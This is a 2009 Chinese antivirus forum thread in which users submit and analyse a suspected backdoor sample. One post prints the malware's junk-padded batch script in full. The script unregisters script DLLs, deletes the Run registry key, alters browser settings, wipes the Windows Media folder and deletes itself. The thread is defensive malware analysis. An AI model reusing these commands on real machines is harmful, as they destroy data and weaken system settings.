瑞星卡卡安全论坛

首页 » 技术交流区 » 可疑文件交流 » 可能是强感染型病毒,急加库。
天月来了 - 2009-8-23 15:08:00
http://bbs.ikaka.com/showtopic-8657394-2.aspx

文件名:染毒文件.rar
下载次数:2
文件类型:application/octet-stream
文件大小: 1.63 M
上传时间:2009-8-23 12:10:54
描述:rar

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
瑞星工程师19 - 2009-8-23 15:12:00
1、文件名:5URP000SOD0.EXE

病毒名:Backdoor.Win32.Undef.eqi

2、文件名:jpwb2009.exe
不是病毒


您所上报的病毒文件将在瑞星2009的21.44.02版本中处理解决。
baohe - 2009-8-23 15:55:00


引用:
原帖由 天月来了 于 2009-8-23 15:08:00 发表
http://bbs.ikaka.com/showtopic-8657394-2.aspx

文件名:[url=http://bbs.ikaka.com/attachment.aspx?attachmentid=557957]染毒文件.r......


母体jpwb2009.exeRAV2010最新库不认识(但RIS2010可有效拦截其网络访问动作)。
jpwb2009.exe运行后释放的那个随机文件名.exe(也就是你附件中的第二个DD)RAV2010可灭掉。


此毒无感染动作。


作者比较菜。此毒作案时(那个.bat运行)居然不隐藏DOS命令窗口:kaka6:


下面两图是其文件创建及注册表改动情况:



 附件: 您所在的用户组无法下载或查看附件



 附件: 您所在的用户组无法下载或查看附件


C盘根目录下的那个.bat内容如下:

sntofhpsilcazdmsntofhpsilcazdm
regsvr32.exe /u /s msvidctl.dll
chhhgrauwtxwvycynfrqygvk
regsvr32.exe /u /s scrrun.dll
nkmzgklnsbmsmcgwihpsktuvfk
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
perkhcwpfhxxseopxuhr
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
agfcivgitrwkdgycbfudem
regsvr32.exe /u /s itss.dll
kakvinrkhaopjpcipzeywzqf
regsvr32.exe /u /s vbscript.dll
ncpfbfcevinybovwwv
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
xwvycynfrqygvkkiuytnbiiacdbrc
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
hzirdqxzfprviqegnseyjpy

ktnjdjiatgiquiwsvddstjvhm
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
uvtuebturrxusuifvor
regsvr32.exe /s jscript.dll
fpymfulwvwsvazeplfkes
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
pjlfgewpreknxfakaomlkyg
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
rlqpgxhrfftbyjcpd
del C:\WINDOWS\Media\*.* /Q
cgwihpsktuvfkckuigtnqrgcgvxt
del C:\WINDOWS\Media\*.* /Q
mibbahcmhtvklssvtlzejm
del %0
del %0
pcolbanfvtfmcxujjxiuqvkg
exit


插进程的是这个随机名dll(在WINDOWS目录下,还有一个同名的txt,二者均可用IceSword强制删除。)



 附件: 您所在的用户组无法下载或查看附件
backway - 2009-8-23 17:24:00
那个批处理以前见过 猫叔发的某个帖子里有~
天月来了 - 2009-8-23 18:13:00
是这样的,这个可能需要下载另一个小程序运行才感染其他盘程序

你如果阻止访问网络,可能就没感染了吧
baohe - 2009-8-23 19:35:00


引用:
原帖由 天月来了 于 2009-8-23 18:13:00 发表
是这样的,这个可能需要下载另一个小程序运行才感染其他盘程序

你如果阻止访问网络,可能就没感染了吧


在全影系统中总共观测两次(每次完成均重启系统)

第一次,开RIS2010所有监控,关闭TINY所有监控。




第二次测试,RIS2010所有监控都关闭,Tiny追踪回滚模式运行样本。Tiny报告的该毒网络访问动作——————全部放行。


3楼的回帖是第二次观测结果。
1
查看完整版本: 可能是强感染型病毒,急加库。